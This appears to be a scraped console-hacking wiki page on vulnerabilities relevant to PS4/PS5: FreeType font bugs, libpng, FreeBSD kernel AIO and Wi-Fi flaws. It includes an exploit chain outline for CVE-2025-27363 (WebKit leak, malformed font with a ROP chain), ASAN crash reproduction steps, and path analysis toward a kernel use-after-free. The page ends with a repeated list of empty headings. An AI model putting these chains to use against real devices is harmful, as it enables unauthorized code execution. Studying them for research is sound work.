An out of bounds write exists in FreeType versions 2.13.0 and below (newer versions of FreeType are not vulnerable) when attempting to parse font subglyph structures related to TrueType GX and variable font files. The vulnerable code assigns a signed short value to an unsigned long and then adds a static value causing it to wrap around and allocate too small of a heap buffer. The code then writes up to 6 signed long integers out of bounds relative to this buffer. This may result in arbitrary code execution.

Web pages now embed fonts, and the affected "variable font files" format is widely used in browsers. It allows parametric adjustment of font properties, described here:

https://developer.mozilla.org/en-US/docs/Web/CSS/CSS_fonts/Variable_fonts_guide

To exploit CVE-2025-27363 on PS4 or PS5, it is required to defeat usermode ASLR. The attacker must leak addresses of the loaded modules and find a way to plant a ROP chain in memory. The ASLR break must be done prior to loading the malformed font since CVE-2025-27363 does not (apparently) give any information leak. The ROP chain may be inserted in the malformed font file if it remains contiguously loaded in memory and if its address can be leaked. A WebKit exploit leading to arbitrary read may be required to use CVE-2025-27363. An exploit strategy proposed by CelesteBlue:

Launch a WebKit exploit to leak some heap and/or modules addresses.
The JS code uses AJAX to send leaked information to the HTTP server.
The HTTP server creates a malformed .ttf font file that will trigger CVE-2025-27363 and contains a PS4 usermode ROP chain.
The JS loads the malformed .ttf font file, triggering the heap buffer overflow.
The heap buffer overflow overwrites a pointer in the heap, now directing to the ROP chain.
The ROP chain runs, fixes the heap and registers then passes to kernel exploitation.

git clone --branch VER-2-13-0 https://gitlab.freedesktop.org/freetype/freetype-demos.git
cd freetype-demos
# In subprojects/freetype2.wrap, set the revision corresponding to 2.13.0:
# revision = de8b92dd7ec634e9e2b25ef534c54a3537555c11 or VER-2-13-0
mkdir build
meson setup build
# In subprojects/freetype2/meson.build, in the "freetype_dep = declare_dependency(" instruction, add
# dependencies: [meson.get_compiler('c').find_library('asan')],
# In subprojects/freetype2/meson.build, set ft2_defines = ['-fsanitize=address']
meson compile -C build
# Ensure that the compiled version is good (2.13.0).
build/ftmulti -v 
# Expected result: ftmulti (FreeType) 2.13
cd build
# Expected result without ASAN:
./ftmulti -- rf2.ttf
Segmentation error (core dumped)
# Expected result with ASAN:
=================================================================
==81377==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000003ae0 at pc 0x64839fc1d94b bp 0x7ffd851da870 sp 0x7ffd851da860
WRITE of size 16 at 0x602000003ae0 thread T0
    #0 0x64839fc1d94a in load_truetype_glyph ../subprojects/freetype2/src/truetype/ttgload.c:1929
    #1 0x64839fc23580 in TT_Load_Glyph ../subprojects/freetype2/src/truetype/ttgload.c:2933
    #2 0x64839fc12881 in tt_glyph_load ../subprojects/freetype2/src/truetype/ttdriver.c:484
    #3 0x64839fbec36b in FT_Load_Glyph ../subprojects/freetype2/src/base/ftobjs.c:1065
    #4 0x64839fbcbc64 in LoadChar ../src/ftmulti.c:382
    #5 0x64839fbcbcc5 in Render_All ../src/ftmulti.c:410
    #6 0x64839fbcd380 in main ../src/ftmulti.c:1168
    #7 0x7f9be9229d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    #8 0x7f9be9229e3f in __libc_start_main_impl ../csu/libc-start.c:392
    #9 0x64839fbcb4f4 in _start (/home/me/freetype-demos/build/ftmulti+0x2b4f4)

0x602000003ae0 is located 0 bytes to the right of 16-byte region [0x602000003ad0,0x602000003ae0)
allocated by thread T0 here:
    #0 0x7f9bea4b4887 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
    #1 0x64839fe180ff in ft_alloc ../subprojects/freetype2/builds/unix/ftsystem.c:113
    #2 0x64839fc0fce3 in ft_mem_qrealloc ../subprojects/freetype2/src/base/ftutil.c:145
    #3 0x64839fc0fa89 in ft_mem_realloc ../subprojects/freetype2/src/base/ftutil.c:101
    #4 0x64839fc1d48a in load_truetype_glyph ../subprojects/freetype2/src/truetype/ttgload.c:1909
    #5 0x64839fc23580 in TT_Load_Glyph ../subprojects/freetype2/src/truetype/ttgload.c:2933
    #6 0x64839fc12881 in tt_glyph_load ../subprojects/freetype2/src/truetype/ttdriver.c:484
    #7 0x64839fbec36b in FT_Load_Glyph ../subprojects/freetype2/src/base/ftobjs.c:1065
    #8 0x64839fbcbc64 in LoadChar ../src/ftmulti.c:382
    #9 0x64839fbcbcc5 in Render_All ../src/ftmulti.c:410
    #10 0x64839fbcd380 in main ../src/ftmulti.c:1168
    #11 0x7f9be9229d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58

SUMMARY: AddressSanitizer: heap-buffer-overflow ../subprojects/freetype2/src/truetype/ttgload.c:1929 in load_truetype_glyph
Shadow bytes around the buggy address:
  0x0c047fff8700: fa fa fa fa fa fa 00 00 fa fa 00 fa fa fa 05 fa
  0x0c047fff8710: fa fa 05 fa fa fa fa fa fa fa fa fa fa fa 07 fa
  0x0c047fff8720: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8730: fa fa fa fa fa fa fa fa fa fa 04 fa fa fa 04 fa
  0x0c047fff8740: fa fa 00 fa fa fa fa fa fa fa 00 fa fa fa 00 00
=>0x0c047fff8750: fa fa 02 fa fa fa 01 fa fa fa 00 00[fa]fa fa fa
  0x0c047fff8760: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8770: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8780: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8790: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff87a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==81377==ABORTING
# Test with lldb:
lldb ./ftmulti -- rf2.ttf
# Expected result:
(lldb) target create "ftmulti"
Current executable set to '/home/me/freetype-demos/build/ftmulti' (x86_64).
(lldb) settings set -- target.run-args  "rf2.ttf"
(lldb) run
Process 52725 launched: '/home/me/freetype-demos/build/ftmulti' (x86_64)
Process 52725 stopped
* thread #1, name = 'ftmulti', stop reason = signal SIGSEGV: invalid address (fault address: 0x555d556ee1f8)
    frame #0: 0x000055555559767d ftmulti`TT_Vary_Apply_Glyph_Deltas(loader=0x00007fffffffd8d0, outline=0x00007fffffffd740, unrounded=0x00005555556ee170) at ttgxvar.c:4339:36
   4336	    /* support, respectively.                                 */
   4337	    if ( face->variation_support & TT_FACE_FLAG_VAR_HADVANCE )
   4338	    {
-> 4339	      point_deltas_x[n_points - 4] = 0;
   4340	      point_deltas_y[n_points - 4] = 0;
   4341	      point_deltas_x[n_points - 3] = 0;
   4342	      point_deltas_y[n_points - 3] = 0;

Implementation[edit | edit source]

Patched[edit | edit source]

Probably patched since PS4 System Software 12.52. Working on PS4 12.00 web browser.

FreeType <= 2.12.1 - Integer overflow in tt_hvadvance_adjust() in src/truetype/ttgxvar.c (CVE-2023-2004)[edit | edit source]

Affects up to 2.12.1 at least.

Bug description[edit | edit source]

An integer overflow vulnerability was discovered in Freetype in tt_hvadvance_adjust() function in src/truetype/ttgxvar.c.

It was discovered that FreeType incorrectly handled certain malformed font files. If a user were tricked into using a specially crafted font file, a remote attacker could cause FreeType to crash, or possibly execute arbitrary code.

FreeType <= 2.10.3 - Heap buffer overflow due to integer truncation in Load_SBit_Png (CVE-2020-15999)[edit | edit source]

A heap buffer overflow has been found in freetype2 before 2.10.4. Malformed TTF files with PNG sbit glyphs can cause a heap buffer overflow in Load_SBit_Png as libpng uses the original 32-bit values, which are saved in png_struct. If the original width and/or height are greater than 65535, the allocated buffer won't be able to fit the bitmap.

FreeType 2 before 2017-02-02 - Heap-buffer-overflow in tt_size_reset (CVE-2017-7864)[edit | edit source]

FreeType 2 before 2017-02-02 has an out-of-bounds write caused by a heap-based buffer overflow related to the tt_size_reset function in truetype/ttobjs.c.

Many vulnerabilities in 2014[edit | edit source]

CVE-2014-9656, CVE-2014-9657, CVE-2014-9658, CVE-2014-9660, CVE-2014-9661, CVE-2014-9662, CVE-2014-9663, CVE-2014-9664, CVE-2014-9666, CVE-2014-9667, CVE-2014-9669, CVE-2014-9670, CVE-2014-9671, CVE-2014-9672, CVE-2014-9673, CVE-2014-9674, CVE-2014-9675

http://advisories.mageia.org/MGASA-2015-0083.html

FreeType <= 2.5.3 - Type42 parsing use-after-free in "FT_Stream_TryRead" (embedded BDF loading) (CVE-2014-9661)[edit | edit source]

Credits[edit | edit source]

Discovered by Mateusz Jurczyk (mjurczyk, j00ru).

Analysis[edit | edit source]

Bug description[edit | edit source]

A use-after-free condition has been encountered in FreeType 2.5.3 while fuzzing Type42 fonts. type42/t42parse.c in FreeType before 2.5.4 does not consider that scanning can be incomplete without triggering an error, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted Type42 font.

git clone --branch VER-2-5-3 https://gitlab.freedesktop.org/freetype/freetype.git
cd freetype
./autogen.sh
mkdir build
cmake ..
make
make install
cd ../..
mv freetype freetype2
git clone --branch VER-2-5-3 https://gitlab.freedesktop.org/freetype/freetype-demos.git
cd freetype-demos
# In Makefile, add -lasan before $(FTLIB) in the linker call
# In Makefile, add -fsanitize=address between $(CC) and $(CPPFLAGS)
make
make
cd bin
./ftbench poc.t42
# Result:
=================================================================
==27108==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61f000001a9c at pc 0x75b41c63a397 bp 0x7ffd114b3990 sp 0x7ffd114b3138
READ of size 2048 at 0x61f000001a9c thread T0
    #0 0x75b41c63a396 in __interceptor_memcpy ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:827
    #1 0x75b41d03c712 in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:29
    #2 0x75b41d03c712 in FT_Stream_TryRead /home/me/freetype/src/base/ftstream.c:182

Implementation[edit | edit source]

Patched[edit | edit source]

Probably patched since PS4 System Software 2.03.

FreeType <= 2.5.3 - OOB RW in cf2_hintmap_build() in the CFF rasterizing (CVE-2014-2240)[edit | edit source]

Credits[edit | edit source]

Discovered by Mateusz Jurczyk (mjurczyk, j00ru).

Analysis[edit | edit source]

Bug description[edit | edit source]

It was reported that Freetype before 2.5.4 suffers from an out-of-bounds stack-based read/write flaw in cf2_hintmap_build() in the CFF rasterizing code, which could lead to a buffer overflow. This is due to an incomplete fix for CVE-2014-2240.

j00ru managed to successfully exploit the vulnerability by crafting a special OTF file which, when processed by the ftbench utility compiled as a 32-bit executable with SSP and PIE enabled and NX disabled, built with clang 3.5, spawned a new command shell.

Patched[edit | edit source]

Probably patched since PS4 System Software 2.03.

FreeType <= 2.4.6 - Integer signedness error in psaux/t1decode.c (CVE-2011-0226)[edit | edit source]

Using FreeType on PS4[edit | edit source]

Freetype-System for PS4 by LightningMods (2020-03-01-2020-03-05)

libPS4freetype2 is a simple wrapper around the original upstream freetype2 library, written by Zer0xFF, that simplifies the process of printing text on the screen in homebrew PS4 programs.

Building FreeType on PC[edit | edit source]

With Meson, for versions around 2.13.0:

git clone --branch VER-2-13-0 https://gitlab.freedesktop.org/freetype/freetype.git
cd freetype
./autogen.sh
mkdir build
meson setup build
meson compile -C build
meson install -C build

With Cmake, for versions around 2.5.3:

git clone --branch VER-2-5-3 https://gitlab.freedesktop.org/freetype/freetype.git
cd freetype
./autogen.sh
mkdir build
cmake ..
make
make install

Font: OpenType and TrueType[edit | edit source]

OpenType and/or TrueType may be used in some components of the PS4 and PS5, like in BD-J.

Memory disclosure in Java via fonts (CVE-2015-2619)[edit | edit source]

When successfully exploited, the security flaw would allow an attacker to leak uninitialized memory from the process heap or kernel pools, potentially leading to the disclosure of sensitive information or facilitating the exploitation of a more serious bug by helping defeat exploit mitigations. Both 32 and 64-bit builds of the affected software were prone to the vulnerability. Similarly to the “blend” issue, due to the cross-platform nature of the bug, it could be used in an exploit chain together with memory corruption bugs to e.g. provide a de-ASLR primitive for a user-mode application (in order to achieve RCE) and then the kernel itself (to escape the sandbox or otherwise elevate attacker’s privileges).

As such, the bug would generally allow uninitialized memory to be reflected in the final glyph’s shape as rasterized on the display. Therefore, in order to actually take advantage of it, it is also necessary to have a way of reading the pixels back and recovering the original uninitialized bytes. No PoC for Java was written, considering its marginal attack vectors.

https://googleprojectzero.blogspot.com/2015/09/enabling-qr-codes-in-internet-explorer.html

libpng[edit | edit source]

libpng is present in the PS4 System Software in the file /system/common/lib/libpng16.sprx stored on the internal HDD and as internal sysmodule 0x800000AB.

There are also libScePngParser (internal sysmodule 0x8000005D), libScePngDec (sysmodule 0x8C) and libScePngEnc (sysmodule 0x8D) libraries on the PS4.

A malicious PNG file can be loaded via many vectors:

in the internet browser, by loading a HTML page that imports a PNG image
in the Media Gallery application, by loading a malicious screenshot stored at /user/av_contents/photo/NPXS20001/NPXS20001/XXX/
in the main menu, by changing PNG files on the internal HDD, notably application icons

Heap buffer overflow in png_image_finish_read (CVE-2025-65018)[edit | edit source]

Triggers error CE-110169-8 on PS5.

libTIFF and zlib[edit | edit source]

https://j00ru.vexillium.org/2014/04/a-case-of-a-curious-libtiff-4-0-3-zlib-1-2-8-memory-disclosure

FFmpeg[edit | edit source]

The SHAREfactory application on PS4 uses FFmpeg and allows to load many file formats and codecs.

https://j00ru.vexillium.org/2014/01/ffmpeg-and-the-tale-of-a-thousand-fixes

libwebp[edit | edit source]

The PS4 may not support the WebP raster graphics file format.

OOB write in ReadHuffmanCodes() (CVE-2023-4063, CVE-2023-41064)[edit | edit source]

Kernel[edit | edit source]

Untested[edit | edit source]

FW 5.00-?11.52? - Unknown bug in aio_multi_delete()[edit | edit source]

Credits[edit | edit source]

2025-04-01 Anonymous for sharing 12.02 and 12.50 PS4 kernel dumps for diffing.
2025-04-01 D-Link Turtle for publicly disclosing the patched code of a bug in PS4 12.50 kernel.

Analysis[edit | edit source]

Patched code in PS4 kernel 12.50 commented by anonymous (2025-04-01)

Bug Description[edit | edit source]

This bug is harder to exploit than the Double free due to aio_multi_delete() improper locking so there is almost no point in studying this one.

Exploit Implementation[edit | edit source]

No PoC available.

Patched[edit | edit source]

Yes in PS4 ?12.00? FW (unpatched in 10.71) and PS5 ?10.00? FW. Probably not working before PS4 FW 5.00 because sys_aio_multi_delete() syscall was not implemented.

FW 5.00-?9.60? - UaF in aio_aqueue() due to credential reference count leak (CVE-2022-23090)[edit | edit source]

Credits[edit | edit source]

2022-08-09 Chris J-D ([email protected]) for discovering, reporting publicly CVE-2022-23090 to FreeBSD and publishing a writeup.

Analysis[edit | edit source]

Bug Description[edit | edit source]

FreeBSD's aio(4) subsystem implements asynchronous I/O. As exposed in CVE-2022-23090, the aio_aqueue() function, used by the lio_listio() system call (#257 on FreeBSD), fails to release a reference to a credential in an error case. An attacker may cause the reference count to overflow, leading to a use-after-free. The PS4 is maybe not affected by this vulnerability because the AIO API was barely implemented before PS4 5.00, and extended in FreeBSD in 2016. Moreover, the vulnerability exists in FreeBSD 12 and 13 but maybe not in FreeBSD 9.1 from which the PS4 kernel takes its source.

Exploit Implementation[edit | edit source]

PoC for FreeBSD 12.3 and 13.0 by Chris J-D (2022-08-16)
Some headers that may be useful:

#define SYS_lio_listio  257
int kern_lio_listio(struct thread *td, int mode, struct aiocb * const *uacb_list,
    struct aiocb **acb_list, int nent, struct sigevent *sig,
    struct aiocb_ops *ops);

Ideas (to be compared with Chris J-D's writeup) to make a PoC for FreeBSD 12.3 by CelesteBlue, based on FreeBSD 12.2 vfs_aio.c:

Precisely, the target error "err4" in the aio_aqueue() function, is triggered only in the case

if (opcode != LIO_MLOCK && ((fp->f_ops->fo_aio_queue == NULL && aio_queue_file(fp, job) != 0) || fo_aio_queue(fp, job) != 0))
   goto err4;

So to jump to err4, the opcode variable must not be LIO_MLOCK, but must be valid to pass earlier checks. Moreover, opcode must not be LIO_NOP else the function exits before triggering the bug. According to

	switch (opcode) {
	case LIO_WRITE:
		error = fget_write(td, fd, &cap_pwrite_rights, &fp);
		break;
	case LIO_READ:
		error = fget_read(td, fd, &cap_pread_rights, &fp);
		break;
	case LIO_SYNC:
		error = fget(td, fd, &cap_fsync_rights, &fp);
		break;
	case LIO_MLOCK:
		fp = NULL;
		break;
	case LIO_NOP:
		error = fget(td, fd, &cap_no_rights, &fp);
		break;
	default:
		error = EINVAL;
	}

the remaining possible opcodes are LIO_WRITE, LIO_READ and LIO_SYNC. If you target LIO_WRITE or LIO_READ, you have to ensure that job->uaiocb.aio_offset >= 0 && fp->f_vnode != NULL && fp->f_vnode->v_type == VCHR. If you target LIO_SYNC, you have to ensure that fp->f_vnode != NULL. Next, you have to make sure that ops->store_kernelinfo(ujob, jid) does not return an error. Then, there are two paths that do not make much difference except a few more values checked.

Path A1: job->uaiocb.aio_sigevent.sigev_notify != SIGEV_KEVENT. Then the code jumps to the no_kqueue label.
Path A2: job->uaiocb.aio_sigevent.sigev_notify == SIGEV_KEVENT. Then, a few more checks have to pass than in path A1. First, you need job->uaiocb.aio_sigevent.sigev_notify_kevent_flags & ~(EV_CLEAR | EV_DISPATCH | EV_ONESHOT)) == 0. Secondly, kqfd_register(kqfd, &kev, td, M_WAITOK) must not return an error. Finally the code arrives at the no_kqueue label.

At the no_kqueue label, there are again two paths to trigger the bug:

Path B1: fp->f_ops->fo_aio_queue == NULL. Then, you have to make aio_queue_file(fp, job) return an error. There are multiple ways.
- Path B1.1: Make aio_qbio(job->userproc, job) return an error. There are tons of ways to do so.
- Path B1.2: Ensure that fp->f_type != DTYPE_VNODE || (fp->f_vnode->v_type != VREG && fp->f_vnode->v_type != VDIR) || (fp->f_vnode->v_mount != NULL && (fp->f_vnode->v_mount->mnt_flag & MNT_LOCAL) == 0). Crafting an invalid vnode should not be that hard.
- Path B1.3 (impossible): Force job->uaiocb.aio_lio_opcode not to be LIO_WRITE, LIO_READ nor LIO_SYNC. This is impossible in our case because earlier we proved that we needed the opcode variable to be LIO_WRITE, LIO_READ or LIO_SYNC to enter this path.
Path B2 (impossible before 2016, so probably impossible on PS4 and FreeBSD 9): fp->f_ops->fo_aio_queue != NULL. Then, you have to make fo_aio_queue(fp, job) return an error. int fo_aio_queue_t(struct file *fp, struct kaiocb *job); is a file operation, which is responsible for queueing and completing an asynchronous I/O request for a given file. See fo_aio_queue introductory commit. It must be specified in the fileops structure.

struct fileops {
	fo_rdwr_t	*fo_read;
	fo_rdwr_t	*fo_write;
	fo_truncate_t	*fo_truncate;
	fo_ioctl_t	*fo_ioctl;
	fo_poll_t	*fo_poll;
	fo_kqfilter_t	*fo_kqfilter;
	fo_stat_t	*fo_stat;
	fo_close_t	*fo_close;
	fo_chmod_t	*fo_chmod;
	fo_chown_t	*fo_chown;
	fo_sendfile_t	*fo_sendfile;
	fo_seek_t	*fo_seek;
	fo_fill_kinfo_t	*fo_fill_kinfo;
	fo_mmap_t	*fo_mmap;
	fo_aio_queue_t	*fo_aio_queue;
	fo_flags_t	fo_flags;	/* DFLAG_* below */
};

Now, looking back to the syscall lio_listio() that calls aio_aqueue(), it does aio_aqueue(td, job, lj, LIO_NOP, ops); so the parameter type is forced to be LIO_NOP. However, in aio_aqueue(), when type == LIO_NOP, the opcode is retrieved from job->uaiocb.aio_lio_opcode, which is itself earlier copied using ops->copyin(ujob, &job->uaiocb);, where ujob is in fact a job element of aiocb_list. The aiocb_list argument is an array of pointers to aiocb structures that describe I/O operations. These operations are executed in an unspecified order. The n argument specifies the size of the array aiocb_list. Null pointers in aiocb_list are ignored. In each control block in aiocb_list, the aio_lio_opcode field specifies the I/O operation to be initiated, as follows:

LIO_READ: Initiate a read operation. The operation is queued as for a call to aio_read(3) specifying this control block.
LIO_WRITE: Initiate a write operation. The operation is queued as for a call to aio_write(3) specifying this control block.
LIO_NOP: Ignore this control block.

In conclusion, by fuzzing calls to the lio_listio() syscall with sufficiently valid arguments and a big aiocb_list that contains jobs such that aiocb_list[i]->aio_lio_opcode=LIO_WRITE or LIO_WRITE, an error may be triggered such as:

EAGAIN Out of resources.
EAGAIN The number of I/O operations specified by n would cause the limit AIO_MAX to be exceeded.
EINTR mode was LIO_WAIT and a signal was caught before all I/O operations completed; see signal(7). (This may even be one of the signals used for asynchronous I/O completion notification.)
EINVAL mode is invalid, or n exceeds the limit AIO_LISTIO_MAX.
EIO One of more of the operations specified by aiocb_list failed. The application can check the status of each operation using aio_return(3).

If lio_listio() fails with the error EAGAIN, EINTR, or EIO, then some of the operations in aiocb_list may have been initiated. If lio_listio() fails for any other reason, then none of the I/O operations has been initiated.

This means that EAGAIN, EINTR, or EIO are likely the errors we want to trigger to obtain a reference count leak.

Patched[edit | edit source]

Maybe (but the bug was also maybe never introduced on PS4).

FW <=?9.xx? - IEEE 802.11 Wi-Fi heap buffer overflow (CVE-2022-23088)[edit | edit source]

Credits[edit | edit source]

m00nbsd working with Trend Micro Zero Day Initiative for discovering the vulnerability and reporting it to FreeBSD (2022-04-05)

Analysis[edit | edit source]

FreeBSD Security advisory for CVE-2022-23088 (2022-04-06)

Bug Description[edit | edit source]

FreeBSD's net80211 kernel subsystem provides infrastructure and drivers for IEEE 802.11 wireless (Wi-Fi) communications. The 802.11 beacon handling routine failed to validate the length of an IEEE 802.11s Mesh ID before copying it to a heap-allocated buffer. While a FreeBSD Wi-Fi client is in scanning mode (i.e., not associated with a SSID) a malicious beacon frame may overwrite kernel memory, leading to remote code execution.

Exploit Implementation[edit | edit source]

PoC for CVE-2022-23088 on FreeBSD 13.00 (2022-06-16)

Patched[edit | edit source]

Maybe in PS4 9.xx and PS5 5.xx.

Not invetigated[edit | edit source]

IPv6 fragmentation and ICMP/ICMP6 packet filter bypass vulnerability in OpenBSD Packet Filter (CVE-2019-5597, CVE-2019-5598)[edit | edit source]

These vulnerabilities may be related to the other IPv6 vulnerabilities exploited successfully on PS4 and PS5. See Vulnerabilities.

It may be related to CVE-2018-4407 that affects Apple XNU:

Denial-of-Service only[edit | edit source]

CVE-2022-23093[edit | edit source]

PS4 DevKit Specific Bugs[edit | edit source]

6.20+ DevKit Specific Bug[edit | edit source]

The Development Kit comes with breakpoint feature that can pause the execution of an application program when the application program accesses a certain location in memory. This data breakpoint is only triggered when an application program accesses memory, but, because of a bug that occurred in version 6.00 of the system software, such breakpoints may be triggered when the kernel accesses the memory of an application program. When this happens, the PlayStation 4 system determines that a serious error has occurred and automatically shuts down the Development Kit.

6.50 DevKit Specific Bug[edit | edit source]

This bug occurs regardless of the method used to set the data breakpoint (occurring both when a breakpoint is set with the host tool and when it is set with the sceDbgSetHardwareBreakPoint() API). Version 6.50 of the system software will be fixed so that data breakpoints are not triggered when the kernel accesses an application program's memory (thus returning to the behavior of versions of the system software prior to version 6.00).

Not exploitable because 32-bit compatibility syscalls not enabled[edit | edit source]

FW <= ?4.05? - amd64_set_ldt Heap Overflow (CVE-2016-1885)[edit | edit source]

Credits[edit | edit source]

2016-10-25 This vulnerability was discovered and researched by Francisco Falcon from Core Exploit Writers Team
2016-10-25 Revised patch to address a problem pointed out by ahaha from Chaitin Tech.

Analysis[edit | edit source]

Bug Description[edit | edit source]

The IA-32 architecture allows programs to define segments, which provides based and size-limited view into the program address space. The memory-resident processor structure, called Local Descriptor Table, usually abbreviated LDT, contains definitions of the segments. Since incorrect or malicious segments would breach system integrity, operating systems do not provide processes direct access to the LDT, instead they provide system calls which allow controlled installation and removal of segments.

A special combination of sysarch(2) arguments, specify a request to uninstall a set of descriptors from the LDT. The start descriptor is cleared and the number of descriptors are provided. Due to lack of sufficient bounds checking during argument validity verification, unbound zero'ing of the process LDT and adjacent memory can be initiated from usermode.

sysarch is syscall #165 on FreeBSD 9.1 and on PS4. Sony removed set_ldt between System Software version 1.76 and 4.05, according to Red-EyeX32.

Exploit Implementation[edit | edit source]

Patched[edit | edit source]

Yes in some FW <= 4.05 and >= 2.00 as set_ldt was removed. The PS4 is maybe not vulnerable because of a possible lack of 32bit implementation for syscalls.

Tested[edit | edit source]

No.

Reference sites[edit | edit source]

Bugs

Theoretical Hardware Attacks[edit | edit source]

Power analysis against SAMU 9.9/10[edit | edit source]

SAMU power/clock glitch fault injection 5/10[edit | edit source]

SAMU backside UV/IR fault injection 3/10[edit | edit source]

SEM/FIB/microprobes 2/10[edit | edit source]

USB[edit | edit source]

Bluetooth[edit | edit source]

Usermode (DVD player)[edit | edit source]

FreeDVDBoot[edit | edit source]

Patched[edit | edit source]

Usermode (network in games and applications)[edit | edit source]

YouTube[edit | edit source]

Netflix[edit | edit source]

WebKit exploit in some PS4 applications (codename WeebSploit)[edit | edit source]

Credits[edit | edit source]

History[edit | edit source]

PS4 applications vulnerable to WebKit exploits[edit | edit source]

Untested PS4 applications[edit | edit source]

File redirection with impact[edit | edit source]

SnagFilms[edit | edit source]

BattleCars Exploit (Buffer Overflow via network in Rocket League)[edit | edit source]

VidNow (TCP Buffer Overflow)[edit | edit source]

Crash Timeline[edit | edit source]

File injection without impact[edit | edit source]

RCE in Neverwinter Nights: Enhanced Edition multiplayer mode[edit | edit source]

Usermode (WebKit)[edit | edit source]

Usermode (untested attack vectors)[edit | edit source]

Leap second 23:59:60 software bug[edit | edit source]

Oldest games and applications[edit | edit source]

Contrast[edit | edit source]

Unity game engine[edit | edit source]

System.Xml.XmlTextReader[edit | edit source]

Various Unity bugs[edit | edit source]

XML: libxml2[edit | edit source]

List of most vulnerabilities fixed in libxml2[edit | edit source]

CVE-2025-24928[edit | edit source]

CVE-2013-0338 / CVE-2013-0339[edit | edit source]

XML: Expat XML Parser[edit | edit source]

List of most vulnerabilities fixed in Expat XML[edit | edit source]

CVE-2024-8176[edit | edit source]

CVE-2022-25315[edit | edit source]

CVE-2022-25313[edit | edit source]

CVE-2022-25235 / CVE-2022-25236 - Expat XML insufficiently sanitizes tag and attribute names[edit | edit source]

CVE-2022-23852[edit | edit source]

CVE-2022-22822[edit | edit source]

CVE-2021-45960[edit | edit source]

CVE-2013-0340 / CVE-2013-0341[edit | edit source]

XML Billion laughs attack[edit | edit source]

JSON: cJSON[edit | edit source]

CVE-2022-24384 - Heap overflow in Lua implementation of cJSON[edit | edit source]

CVE-2016-10749 - Buffer overflow in parse_string() when last input character is a backslash[edit | edit source]

CVE-2016-4303 - parse_string() mishandles UTF8/16 strings[edit | edit source]

JSON: JSON for Modern C++[edit | edit source]

JSON: Newtonsoft.Json[edit | edit source]

JSON: System.Json[edit | edit source]

CLAPACK[edit | edit source]

CVE-2021-4048[edit | edit source]

Font: FreeType 2[edit | edit source]

FreeType <= 2.13.0 - OOB write (CVE-2025-27363)[edit | edit source]

Analysis[edit | edit source]

Bug description[edit | edit source]

Implementation[edit | edit source]

Patched[edit | edit source]

FreeType <= 2.12.1 - Integer overflow in tt_hvadvance_adjust() in src/truetype/ttgxvar.c (CVE-2023-2004)[edit | edit source]

Bug description[edit | edit source]

FreeType <= 2.10.3 - Heap buffer overflow due to integer truncation in Load_SBit_Png (CVE-2020-15999)[edit | edit source]

FreeType 2 before 2017-02-02 - Heap-buffer-overflow in tt_size_reset (CVE-2017-7864)[edit | edit source]

OOB write (CVE-2017-8287)[edit | edit source]

OOB write (CVE-2017-8105)[edit | edit source]

Heap buffer overflow (CVE-2016-10328)[edit | edit source]

Heap buffer overflow (CVE-2016-10244)[edit | edit source]

Savannah bugs 41309 and 41590[edit | edit source]

Many vulnerabilities in 2014[edit | edit source]

FreeType <= 2.5.3 - Type42 parsing use-after-free in "FT_Stream_TryRead" (embedded BDF loading) (CVE-2014-9661)[edit | edit source]

Credits[edit | edit source]

Analysis[edit | edit source]

Bug description[edit | edit source]

Implementation[edit | edit source]

Patched[edit | edit source]